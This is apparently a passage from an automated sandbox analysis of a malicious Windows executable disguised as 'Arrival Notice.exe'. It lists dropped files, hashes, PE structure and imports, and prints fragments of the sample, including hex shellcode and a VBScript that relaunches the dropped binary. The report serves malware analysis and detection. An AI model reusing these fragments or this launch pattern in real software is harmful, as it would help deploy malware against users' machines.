                                            Preview:EA06.....C9T.>.L.S.s~F.R..TZMZ.M......BoO.T.......|\..B}P......-...V.4.A%.OhR....#..*..$.wj.H-2I|.!&../...^. .M.4z.>....D..7..5..f.#.d.b.Q.O)...?.Q..k....a..y........h.6ao..).9...34...[..y.4.S...k.0..i.....Z........#...F...<u.je.........O..S...&.....T...Gl3..z.P}<.`.@.P..jT.@......V..o*.....C\..R@..5D.....Q+..o).MkT....@A/..G.......jH.....&T..2....w.]J..(R*.X....).W...|.W....G.R3.....4..k?...y..E...]o....+.m..9..O...[.B.{.{../E...u.T...c...D..=.I.....W..q;....9.A>....S..y......a._..u...o...F%..O..IT.oc......V.....#QD..z;.6{;..hk.x.".I...I.o7..`a..].9.... .......d.......H...8..N..(.....P......B*.(U@......x.uZ.......:.......xs._.M...........Be.,>.%2.A.qZ..AA..h..4Wm..q....O..R.p.\.mI.U....k.A..l..uJ....uF.w.C...u..i.b <.F.....#..<.....d.. s.U-.....9.2.;Y7......+.E.N'r...8..5*$.M$.Z.Q........b.H...h.....k.uf;..D*T.v..Y.V....!!0......N.J.."Uj.&5......).T.t..Z.V.S.[...qN..!..URe/../.J}.h.xY.3Y..b..^!..Mj.:. '4.d..N.k)...-V.Q...-"q...f..N...F...l.
                                            Process:C:\Users\user\AppData\Local\directory\name.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):9842
                                            Entropy (8bit):7.596876375424286
                                            Encrypted:false
                                            SSDEEP:192:65jwEiqxwzMZTG3cL8Z1KDS7kPgKnVx00uYsLLZbku5nDkUcS:I6qxwzMZy3kDS7kPgKD8BLdIakQ
                                            MD5:BEDFA8109472436EFCDDCC5DB4B355FD
                                            SHA1:AA532618BA72610E2B3C4C3F0DC75E2C5C13463F
                                            SHA-256:24BD552677A47E0DC827BB9E19FF928BDCA606DDAC6B96A2744AD45DCCD4E73C
                                            SHA-512:910F6D68460E42162CCA8BA892499ECB5EB911D3B6366DEA0837F2A38597A78E58E95D99FE79E9F51A24DCE5F768C53947CE370C684FFBDACF5156512C82FDBE
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@
                                            Process:C:\Users\user\AppData\Local\directory\name.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):149320
                                            Entropy (8bit):7.8836938731943365
                                            Encrypted:false
                                            SSDEEP:3072:SwI8/QD3R12aQgtBw9iKH5DYH7PBU1VUU7lAUnHj3+BEwkVbSH2P7X7Z:SwIDD3R12+S9dZEMlAUHld
                                            MD5:298BBF26B85A7A461A022D093B4C93A9
                                            SHA1:9670B8099FD6042CB27AC2132D8D147D37A1AAB3
                                            SHA-256:CEF00C162693E7288D3558531670672DEE84C7839B54CD68B6ADD9EC7D6CFF40
                                            SHA-512:D7FAF2B895A97FA3B13602095630473D209A10B698BB9D3CA97A5EF3D3CDA2B0694C27376E531C8637BE7651C69C24EEAB5A04380F6B7BB84C05EDFFCBCB7173
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06.....C9T.>.L.S.s~F.R..TZMZ.M......BoO.T.......|\..B}P......-...V.4.A%.OhR....#..*..$.wj.H-2I|.!&../...^. .M.4z.>....D..7..5..f.#.d.b.Q.O)...?.Q..k....a..y........h.6ao..).9...34...[..y.4.S...k.0..i.....Z........#...F...<u.je.........O..S...&.....T...Gl3..z.P}<.`.@.P..jT.@......V..o*.....C\..R@..5D.....Q+..o).MkT....@A/..G.......jH.....&T..2....w.]J..(R*.X....).W...|.W....G.R3.....4..k?...y..E...]o....+.m..9..O...[.B.{.{../E...u.T...c...D..=.I.....W..q;....9.A>....S..y......a._..u...o...F%..O..IT.oc......V.....#QD..z;.6{;..hk.x.".I...I.o7..`a..].9.... .......d.......H...8..N..(.....P......B*.(U@......x.uZ.......:.......xs._.M...........Be.,>.%2.A.qZ..AA..h..4Wm..q....O..R.p.\.mI.U....k.A..l..uJ....uF.w.C...u..i.b <.F.....#..<.....d.. s.U-.....9.2.;Y7......+.E.N'r...8..5*$.M$.Z.Q........b.H...h.....k.uf;..D*T.v..Y.V....!!0......N.J.."Uj.&5......).T.t..Z.V.S.[...qN..!..URe/../.J}.h.xY.3Y..b..^!..Mj.:. '4.d..N.k)...-V.Q...-"q...f..N...F...l.
                                            Process:C:\Users\user\AppData\Local\directory\name.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):9842
                                            Entropy (8bit):7.596876375424286
                                            Encrypted:false
                                            SSDEEP:192:65jwEiqxwzMZTG3cL8Z1KDS7kPgKnVx00uYsLLZbku5nDkUcS:I6qxwzMZy3kDS7kPgKD8BLdIakQ
                                            MD5:BEDFA8109472436EFCDDCC5DB4B355FD
                                            SHA1:AA532618BA72610E2B3C4C3F0DC75E2C5C13463F
                                            SHA-256:24BD552677A47E0DC827BB9E19FF928BDCA606DDAC6B96A2744AD45DCCD4E73C
                                            SHA-512:910F6D68460E42162CCA8BA892499ECB5EB911D3B6366DEA0837F2A38597A78E58E95D99FE79E9F51A24DCE5F768C53947CE370C684FFBDACF5156512C82FDBE
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@
                                            Process:C:\Users\user\Desktop\Arrival Notice.exe
                                            File Type:ASCII text, with very long lines (28756), with no line terminators
                                            Category:dropped
                                            Size (bytes):28756
                                            Entropy (8bit):3.592228891803325
                                            Encrypted:false
                                            SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbp+IAyd4vfF3if6gyuqY:miTZ+2QoioGRk6ZklputwjpjBkCiw2Rh
                                            MD5:EFF99813AA6E4E81A2FB99794D10F3F3
                                            SHA1:72350AA8B62EB331AE037ECF1995AD693E81463C
                                            SHA-256:F1FC41E1ECC7CDD59277453FB0C6246CCA899DAFF29125B403BC3C9EF508A029
                                            SHA-512:C1E0F571647103DCC0D2E6B15ABC4928F20E1A26058AC99D8ED57A30D8FEE73A3441C5E059AFF2DEB39DA6AE6EBDA84A89C5AAF136060D58662D315DE18D58FF
                                            Malicious:false
                                            Reputation:low
                                            Preview:8D6804F867D7E3ED21599F86932DA5673082A29A59B06B261C54E6F1DF089BBB368C973697738FDC880x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff
                                            Process:C:\Users\user\Desktop\Arrival Notice.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):242688
                                            Entropy (8bit):6.615883545071942
                                            Encrypted:false
                                            SSDEEP:6144:9cH9sKHMp1YRDRybetHbIpMYKBCgM3WtW:+9sK61YRDRPHkp9gM3sW
                                            MD5:B378E58431A93DD5F62E717E260A2AD5
                                            SHA1:7CF20C60DF5BBC57C07C9E24A1AE3DEA6A7EAE9D
                                            SHA-256:37C2740218CCA73CA30008FF9A04733095EB364FD1CD723FFE11FBA1CA39C630
                                            SHA-512:67A3EFB5A5D3B8F32284E920C05BE1D0624697EDBB28A4B331E2633DCA8E9CEECC51674BA25806118FA875AB38D40B0D8C7F1F80F24A68F9CFDA6BC325EEF334
                                            Malicious:false
                                            Reputation:low
                                            Preview:...M3OEL<NS7.JR.JREIVZMpOEL8NS77OJROJREIVZM0OEL8NS77OJROJRE.VZM>P.B8.Z...K..k.- %z=B ">Y#sTV!$=;j0 i$/#.&+l|...Z .7aG_OmVZM0OELh.S7{NIR..a#IVZM0OEL.NQ6<NARO.QEI^ZM0OEL..P77oJRO.QEIV.M0oEL8LS73OJROJREMVZM0OEL8nW77MJROJREKV..0OUL8^S77OZROZREIVZM OEL8NS77OJR+.QE.VZM0.FL~KS77OJROJREIVZM0OEL8NW7;OJROJREIVZM0OEL8NS77OJROJREIVZM0OEL8NS77OJROJREIVZM0oEL0NS77OJROJREAvZMxOEL8NS77OJRa>7==VZM..FL8nS77.IROHREIVZM0OEL8NS7.OJ2a8!7*VZMvJEL8.P77IJRO.QEIVZM0OEL8NS7wOJ.a87)&5ZM<OEL8NW77MJRO.QEIVZM0OEL8NS7wOJ.OJREIVZM0OEL8NS7..IROJRE.VZM2O@Lh.Q7#{KRLJREHVZK0OEL8NS77OJROJREIVZM0OEL8NS77OJROJREIVZM0OEL8NS7*....{.+dGRH.j.).4..Y..3..F.O.K[.s.^.....h?T..V.B...1...:.ZJ3S...../N=6&.@.@+.R....k{9p..JV.)...4`.$Ta....if...8C....>..*97cQ?5 ]`.VQ.8;.H.DIVZM......^7..bI][}D".....\+a...1JRE-VZMBOELYNS7pOJR JRE'VZMNOELFNS7qOJR.JRE~VZM.OELUNS7.OJR1JRE.+UB...%K.77OJRz..u.;....{....F.4.-r...2....@..A;.@.....\.=..'..J...06INWMMVFEkT...m:JW25HNQCw\....l.i....F...0.9IVZM0O.L8.S77..R.JRE.V.M..EL8.7.O.R...E
                                            Process:C:\Users\user\Desktop\Arrival Notice.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):1246208
                                            Entropy (8bit):6.927575832799878
                                            Encrypted:false
                                            SSDEEP:24576:vAHnh+eWsN3skA4RV1Hom2KXMmHa0e6nnjqKoepv9JpkUmgJQv5:Sh+ZkldoPK8Ya6jqKoepv9JpNJA
                                            MD5:954F20C5963FC61A5848F7BF9FEF6BA4
                                            SHA1:FC49C57595E06950054AF47AC676C122B18DBA41
                                            SHA-256:7D32FFB777ED327A39961748D04917F29B52BF373E7CB07A64CC86EBC172352B
                                            SHA-512:9BED0BBB403F60CFC2CC13A93784C356BE01A3679676505CB7BBFC86E39B658381BDB2218E0B199F35068851E58FF535C0409DE7494504E63C9EC09BBA85688D
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 63%
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L....).f..........".......... ....................@..........................`......:.....@...@.......@.........................|........]......................4q...+..............................PK..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....].......^...4..............@..@.reloc..4q.......r..................@..B........................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\AppData\Local\directory\name.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):274
                                            Entropy (8bit):3.408374803490271
                                            Encrypted:false
                                            SSDEEP:6:DMM8lfm3OOQdUfclzXUEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlDQ1A1z4mA2n
                                            MD5:86948B136B1F801E8D67F09107FE8579
                                            SHA1:958A64F475E162FD6B7EE3A5CC11E1D49EF7CF99
                                            SHA-256:AAE1242E1E0755FD14206D7FF8807311E68529F049AB1A47EA105E405C9494F7
                                            SHA-512:9572FB2BCBB26BFF379A3ED930BEFECD6BC1A185A8FD5B47E60D7B09A50CD49C8B92569EB9667B0EFE71540232E46BC3D64B8BAB8A5996EAB9CE3625B5E08E4F
                                            Malicious:true
                                            Reputation:moderate, very likely benign file
                                            Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):6.927575832799878
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:Arrival Notice.exe
                                            File size:1'246'208 bytes
                                            MD5:954f20c5963fc61a5848f7bf9fef6ba4
                                            SHA1:fc49c57595e06950054af47ac676c122b18dba41
                                            SHA256:7d32ffb777ed327a39961748d04917f29b52bf373e7cb07a64cc86ebc172352b
                                            SHA512:9bed0bbb403f60cfc2cc13a93784c356be01a3679676505cb7bbfc86e39b658381bdb2218e0b199f35068851e58ff535c0409de7494504e63c9ec09bba85688d
                                            SSDEEP:24576:vAHnh+eWsN3skA4RV1Hom2KXMmHa0e6nnjqKoepv9JpkUmgJQv5:Sh+ZkldoPK8Ya6jqKoepv9JpNJA
                                            TLSH:F245AE037780C079FFAA91B35B16E24567BDAC6A8123951F13C82A7ABDF05B1163D723
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                            Icon Hash:73191a131b1f736e
                                            Entrypoint:0x42800a
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x668529BE [Wed Jul 3 10:36:46 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:afcdf79be1557326c854b6e20cb900a7
                                            Instruction
                                            call 00007F92DCBB707Dh
                                            jmp 00007F92DCBA9E34h
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            push edi
                                            push esi
                                            mov esi, dword ptr [esp+10h]
                                            mov ecx, dword ptr [esp+14h]
                                            mov edi, dword ptr [esp+0Ch]
                                            mov eax, ecx
                                            mov edx, ecx
                                            add eax, esi
                                            cmp edi, esi
                                            jbe 00007F92DCBA9FBAh
                                            cmp edi, eax
                                            jc 00007F92DCBAA31Eh
                                            bt dword ptr [004C41FCh], 01h
                                            jnc 00007F92DCBA9FB9h
                                            rep movsb
                                            jmp 00007F92DCBAA2CCh
                                            cmp ecx, 00000080h
                                            jc 00007F92DCBAA184h
                                            mov eax, edi
                                            xor eax, esi
                                            test eax, 0000000Fh
                                            jne 00007F92DCBA9FC0h
                                            bt dword ptr [004BF324h], 01h
                                            jc 00007F92DCBAA490h
                                            bt dword ptr [004C41FCh], 00000000h
                                            jnc 00007F92DCBAA15Dh
                                            test edi, 00000003h
                                            jne 00007F92DCBAA16Eh
                                            test esi, 00000003h
                                            jne 00007F92DCBAA14Dh
                                            bt edi, 02h
                                            jnc 00007F92DCBA9FBFh
                                            mov eax, dword ptr [esi]
                                            sub ecx, 04h
                                            lea esi, dword ptr [esi+04h]
                                            mov dword ptr [edi], eax
                                            lea edi, dword ptr [edi+04h]
                                            bt edi, 03h
                                            jnc 00007F92DCBA9FC3h
                                            movq xmm1, qword ptr [esi]
                                            sub ecx, 08h
                                            lea esi, dword ptr [esi+08h]
                                            movq qword ptr [edi], xmm1
                                            lea edi, dword ptr [edi+08h]
                                            test esi, 00000007h
                                            je 00007F92DCBAA015h
                                            bt esi, 03h
                                            Programming Language:
                                            • [ASM] VS2013 build 21005
                                            • [ C ] VS2013 build 21005
                                            • [C++] VS2013 build 21005
                                            • [ C ] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729
                                            • [ASM] VS2013 UPD5 build 40629
                                            • [RES] VS2013 build 21005
                                            • [LNK] VS2013 UPD5 build 40629
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x65da4.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x12e0000x7134.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0xc80000x65da40x65e00d11a97978a51eb1aaa7bfc828fac9ca4False0.6538846817484663data7.160081904626778IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x12e0000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0xc86c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                            RT_ICON0xc87f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                            RT_ICON0xc89180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                            RT_ICON0xc8a400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.5671641791044776
                                            RT_ICON0xc98e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.6624548736462094
                                            RT_ICON0xca1900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishGreat Britain0.6036866359447005
                                            RT_ICON0xca8580x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.47760115606936415
                                            RT_ICON0xcadc00x64c1PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9930989028030861
                                            RT_ICON0xd12840x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.1848456169407311
                                            RT_ICON0xe1aac0x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishGreat Britain0.3375551818372924
                                            RT_ICON0xeaf540x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishGreat Britain0.34515037593984965
                                            RT_ICON0xf173c0x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishGreat Britain0.3652033271719039
                                            RT_ICON0xf6bc40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain0.3302432687765706
                                            RT_ICON0xfadec0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.49813278008298756
                                            RT_ICON0xfd3940x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.5572232645403377
                                            RT_ICON0xfe43c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishGreat Britain0.7163934426229508
                                            RT_ICON0xfedc40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7562056737588653
                                            RT_MENU0xff22c0x50dataEnglishGreat Britain0.9
                                            RT_STRING0xff27c0x594dataEnglishGreat Britain0.3333333333333333
                                            RT_STRING0xff8100x68adataEnglishGreat Britain0.2747909199522103
                                            RT_STRING0xffe9c0x490dataEnglishGreat Britain0.3715753424657534
                                            RT_STRING0x10032c0x5fcdataEnglishGreat Britain0.3087467362924282
                                            RT_STRING0x1009280x65cdataEnglishGreat Britain0.34336609336609336
                                            RT_STRING0x100f840x466dataEnglishGreat Britain0.3605683836589698
                                            RT_STRING0x1013ec0x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                            RT_RCDATA0x1015440x2c28cdata1.0003648908644596
                                            RT_GROUP_ICON0x12d7d00xcadataEnglishGreat Britain0.6683168316831684
                                            RT_GROUP_ICON0x12d89c0x14dataEnglishGreat Britain1.25
                                            RT_GROUP_ICON0x12d8b00x14dataEnglishGreat Britain1.15
                                            RT_GROUP_ICON0x12d8c40x14dataEnglishGreat Britain1.25
                                            RT_VERSION0x12d8d80xdcdataEnglishGreat Britain0.6181818181818182
                                            RT_MANIFEST0x12d9b40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                            DLLImport
                                            WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                            VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                            WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                            PSAPI.DLLGetProcessMemoryInfo
                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                            USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                            UxTheme.dllIsThemeActive
                                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
